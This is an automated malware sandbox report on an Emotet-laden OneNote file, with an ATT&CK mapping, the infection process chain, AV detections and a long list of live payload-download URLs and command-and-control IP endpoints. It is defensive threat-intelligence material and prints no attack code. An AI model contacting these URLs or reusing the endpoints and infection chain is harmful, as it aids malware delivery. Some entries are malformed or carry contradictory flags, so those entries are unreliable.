              MITRE ATT&CK Matrix (a number before a technique name is the hit badge shown in the report for that cell)

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 1 Scripting | 1 DLL Side-Loading | 111 Process Injection | 21 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | 1 Exploitation for Client Execution | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 121 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Scripting | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 114 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Regsvr32 | DCSync | 25 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
              Behavior Graph ID: 828495 Sample: Insight_Medical_Publishing_3.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100
              [Behavior graph image not reproduced; process chain recovered from the graph labels]
              ONENOTE.EXE -> wscript.exe (contacts penshorn.org 203.26.41.131:443 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia; drops C:\Users\user\AppData\...\rad38C2A.tmp.dll (PE32+) and C:\Users\user\AppData\Local\Temp\click.wsf (ASCII); signature: System process connects to network (likely due to code injection or exploit)) -> regsvr32.exe -> regsvr32.exe (drops C:\Windows\...\GJcmgWEWTZrc.dll (copy) (PE32+); signature: Hides that the sample has been downloaded from the Internet (zone.identifier)) -> regsvr32.exe (contacts 160.16.142.56:8080 SAKURA-BSAKURAInternetIncJP Japan, 91.121.146.47:8080 OVHFR France and 8 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit))
              Graph-level nodes: 129.232.188.93 xneeloZA South Africa; 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil; 36 other IPs or domains; signatures: Snort IDS alert for network traffic, Multi AV Scanner detection for domain / URL, Antivirus detection for URL or domain, 7 other signatures

              Source | Detection | Scanner | Label
              Insight_Medical_Publishing_3.one | 31% | ReversingLabs | Script-WScript.Trojan.OneNote
              Insight_Medical_Publishing_3.one | 41% | Virustotal |
              Source | Detection | Scanner | Label
              C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll | 58% | ReversingLabs | Win64.Trojan.Emotet
              C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy) | 58% | ReversingLabs | Win64.Trojan.Emotet
              Source | Detection | Scanner | Label
              12.2.regsvr32.exe.1220000.0.unpack | 100% | Avira | HEUR/AGEN.1215476
              11.2.regsvr32.exe.f10000.0.unpack | 100% | Avira | HEUR/AGEN.1215476
              Source | Detection | Scanner | Label
              penshorn.org | 11% | Virustotal |
              windowsupdatebg.s.llnwi.net | 0% | Virustotal |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              penshorn.org | 203.26.41.131 | true | true | | unknown
              windowsupdatebg.s.llnwi.net | 178.79.242.128 | true | false | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ | true | Avira URL Cloud: malware | unknown
              https://penshorn.org/admin/Ses8712iGR8du/ | true | Avira URL Cloud: malware | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/eBregsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://159.89.202.34/regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • 19%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              https://182.162.143.56/regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/#regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
URL: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000003.421394475.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/x
  Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: true
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://pe2.162.143.56/
  Source: regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012C4000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: low
URL: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
  Source: wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://91.121.146.47:8080/
  Source: regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://187.172.199.165:8080/
  Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl//6(
  Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://www.gomespontes.com.br/logs/pd/vM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/l
  Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/h
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/IT
  Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/000
  Source: regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
  Source: wscript.exe, 00000009.00000003.349639269.000000000538E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349867697.0000000005396000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/n
  Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://portalevolucao.com/GerarBoleto/fLIOoFb
  Source: wscript.exe, 00000009.00000003.347225816.00000000050AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: http://ozmeydan.com/cekici/9/
  Source: wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://penshorn.org/
  Source: wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.350000568.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354012857.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.0000000005423000.00000004.00000020.00020000.00000000.sdmp
  Malicious: true
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://www.gomespontes.com.br/logs/pd/
  Source: wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://penshorn.org/admin/Ses8712iGR8du/tM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: true
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/mwollpl/
  Source: regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1j
  Source: wscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: http://softwareulike.com/cWIYxWMPkK/7
  Source: wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345755235.0000000005160000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/
  Source: regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
  Source: wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: http://softwareulike.com/cWIYxWMPkK/yM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/l/
  Source: regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmp
  Malicious: true
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://167.172.199.165:8080/8
  Source: regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://159.89.202.34/I
  Source: regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllNZr
  Source: wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349438794.0000000005384000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349093361.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349339319.000000000537A000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: http://softwareulike.com/cWIYxW
  Source: wscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: http://ozmeydan.com/cekici/9/xM
  Source: wscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://187.63.160.88:80/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/01
  Source: regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus detection: Avira URL Cloud: malware
  Reputation: unknown
URL: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
